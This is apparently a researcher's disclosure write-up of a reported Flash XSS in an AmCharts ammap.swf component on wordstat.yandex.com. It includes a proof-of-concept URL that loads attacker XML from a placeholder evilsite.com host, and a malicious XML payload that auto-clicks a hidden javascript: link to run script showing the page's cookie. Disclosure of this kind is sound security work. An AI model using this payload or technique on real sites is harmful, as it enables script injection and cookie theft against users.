XSS in Yandex - AmCharts component

Here I present a (reported) Flash-based XSS vulnerability I discovered in wordstat.yandex.com, which requires no user interaction.

I think it is particularly interesting for several reasons. It exploits the fact that the ammap.swf file, which is part of AmCharts, is vulnerable to external resource loading which allows for content spoofing and, ultimately, arbitrary JavaScript execution in the context of the hosting domain (in this case, wordstat.yandex.com).

By disassembling the SWF, we discover that the data_file and settings_file parameters are user controllable and injectable directly in the URL.

Disassembling the SWF (1)

Disassembling the SWF (1)

The parameters are then retrieved and the XML is parsed:

Disassembling the SWF (2)

Disassembling the SWF (2)

Quick link to a proof of concept:

http://wordstat.yandex.com/flash/ammap/ammap.swf?path=&data_file=http://evilsite.com/ammap_data.xml &settings_file=http://evilsite.com/ammap_settings.xml&.swf

We control the "map" by providing two XML files, hosted on an external server.

File ammap_settings.xml just sets a white background, disables control such as zoom and arrows, legend, small map, etc.

File ammap_data.xml is the interesting one. Here is the malicious payload:

<?xml version="1.0" encoding="UTF-8"?>
<map map_file="http://appsec.ws/ExploitDB/Configs/amMap/people.swf" zoom="100%" url="#xss">
  <movies>
    <movie file="rectangle" oid="xss" x="0" y="0" width="100%" height="100%" color="#FFFFFF"
    alpha="0" url="javascript:alert('XSS by Miki (//miki.it)\ndocument.domain = ' +
    document.domain + '\ndocument.cookie = ' + document.cookie + '\nlocation.href = ' +
    location.href)">
    </movie>
  </movies>
</map>

As you can see, an external SWF is loaded as a map, and an area (called a movie) of rectangular shape (file="rectangle") that covers the whole screen and is transparent (alpha="0").

The area, if clicked, brings to the execution of a simple JavaScript function, in this case an alert box that displays document.domain, document.cookie and location.href.

In order to make it work without user interaction, we have added an object id (oid) to the movie with the oid="xss" tag, and simulated a click of the movie with the url="#xss" attribute of the <map> tag, as documented in AmCharts documentation:

Attribute Type Meaning
url #object_id Id of object which should be "clicked" when map initializes

This leads to arbitrary JS execution in the context of wordstat.yandex.com without any user interaction:

Javascript executed by just opening a URL.

Javascript executed by just opening a URL.